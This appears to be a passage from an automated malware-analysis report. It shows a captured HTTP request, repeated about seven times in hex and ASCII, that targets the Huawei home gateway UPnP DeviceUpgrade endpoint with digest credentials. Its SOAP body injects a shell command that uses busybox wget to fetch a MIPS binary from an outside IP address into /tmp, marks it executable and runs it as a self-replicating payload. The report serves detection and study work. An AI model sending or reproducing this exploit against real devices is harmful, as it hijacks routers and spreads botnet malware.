6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
